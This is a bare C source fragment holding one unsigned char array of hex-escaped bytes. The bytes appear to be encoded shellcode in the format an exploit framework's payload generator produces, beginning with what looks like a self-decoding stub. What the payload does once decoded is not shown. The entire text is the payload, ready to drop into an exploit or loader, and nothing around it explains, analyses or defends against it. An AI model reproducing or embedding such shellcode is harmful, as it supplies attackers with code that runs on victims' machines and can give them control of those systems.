unsigned char buf[] = 
"\xbf\xdb\x18\x00\x2c\xd9\xe1\xd9\x74\x24\xf4\x5d\x29\xc9"
"\xb1\x22\x31\x7d\x12\x83\xed\xfc\x03\xa6\x16\xe2\xd9\x3e"
"\x9f\xe6\x21\xbe\xdf\x80\x9a\xbf\xdf\x4c\xdd\xd9\x66\x24"
"\xdd\x25\x99\xd3\x67\x32\x99\x1b\x98\xf1\x19\x7d\x20\x0a"
"\x1a\x82\x50\x6a\xa1\x82\x50\x72\xd5\xe4\xe9\xf6\xd5\xe8"
"\x09\x90\x6f\xed\x09\x5c\x90\x23\x89\x3a\x29\xab\x8a\xc2"
"\x49\xab\x00\x43\xcd\x33\x15\x43\xf2\x39\x61\x49\x6c\x77"
"\xef\xce\x89\x87\x9b\xc3\x82\x63\x05\x5b\xd0\x74\xca\x9b"
"\xbf\x75\x02\xfd\x77\x11\x18\x19\x08\x3e\x1d\x7f\xb0\xc0"
"\x1e\x7f\xc0\x0f\x9e\x2f\xac\xea\xfe\xbc\x49\xd5\x65\x2c"
"\xe6\x70\x14\x90\x67\x5b\xb6\xa5\x0a\xf9\x23\x37\xef\xdd"
"\x9a\x84\x3c\x29\xd9";
